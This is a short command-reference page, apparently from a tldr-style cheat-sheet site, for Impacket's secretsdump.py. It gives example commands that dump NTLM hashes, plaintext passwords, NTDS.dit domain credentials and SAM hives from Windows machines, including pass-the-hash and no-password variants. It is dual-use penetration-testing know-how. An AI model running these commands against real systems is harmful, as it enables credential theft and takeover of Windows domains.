secretsdump.py

Dump NTLM hashes, plaintext passwords, and domain credentials from remote Windows systems. Part of the Impacket suite. More information: https://github.com/fortra/impacket.

Dump credentials from a Windows machine using a username and password:

secretsdump.py domain/username:password@target

Dump hashes from a machine using pass-the-hash authentication:

secretsdump.py -hashes LM_Hash:NT_Hash domain/username@target

Dump credentials from Active Directory’s NTDS.dit file:

secretsdump.py -just-dc domain/username:password@target

Extract credentials from a local SAM database using registry hives:

secretsdump.py -sam path/to/SAM -system path/to/SYSTEM

Dump hashes from a machine without providing a password (if a valid authentication session exists, e.g. via Kerberos or NTLM SSO):

secretsdump.py -no-pass domain/username@target

Report New Issue View Source

secretsdump.py

Contribute to This Page

Discuss this page